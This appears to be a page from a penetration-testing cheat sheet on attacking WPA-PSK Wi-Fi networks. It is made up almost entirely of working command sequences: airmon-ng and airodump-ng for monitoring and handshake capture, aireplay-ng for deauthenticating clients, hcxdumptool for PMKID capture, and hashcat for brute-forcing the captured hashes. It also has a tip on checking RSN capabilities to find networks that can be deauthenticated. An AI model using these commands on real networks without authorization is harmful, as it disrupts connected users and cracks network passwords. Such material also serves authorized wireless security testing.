PSK

Handshake

Start monitoring mode

$ airmon-ng start wlan0

Monitor networks

$ airodump-ng wlan0

Dump target’s traffic

$ airodump-ng -c CHANNEL --bssid BSSID -w ESSID wlan0

Deauth clients

 aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0

Where:

0 means deauthentication
1 is the number of deauths to send (you can send multiple if you wish); 0 means send them continuously
a 00:14:6C:7E:40:80 is the MAC address of the access point
c 00:0F:B5:34:30:30 is the MAC address of the client to deauthenticate; if this is omitted then all clients are deauthenticated
ath0 is the interface name

PMKID

https://habr.com/ru/companies/jetinfosystems/articles/419383/

Начните захват PMKID хешей для указанных беспроводных сетей:

echo HH:HH:HH:HH:HH:HH | sed 's/\\://g' >> filter.txt hcxdumptool --enable_status=1 -o hcxdumptool_results.cap -i wlan0mon --filterlist

install


sudo apt install hcxtools

grab

sudo hcxdumptool -i wlan0 -w hcx.cap

loot

hcxpcapngtool hcx.cap -o hcx.hc22000

check

hcxhashtool --info=stdout -i hcx.hc22000

brute

hashcat -m 22000 hcx.hc22000 wordlist

Check possibless deauth

sniff traffic, find Beacon FrameIEEE 802.11 Wireless Management -> Tagged parameters -> Tag: RSN Information -> RSN Capabilities: 0x0028 If frame protection false that we can deauth clients

PreviousWI-FI NextEnterprise

Last updated 9 months ago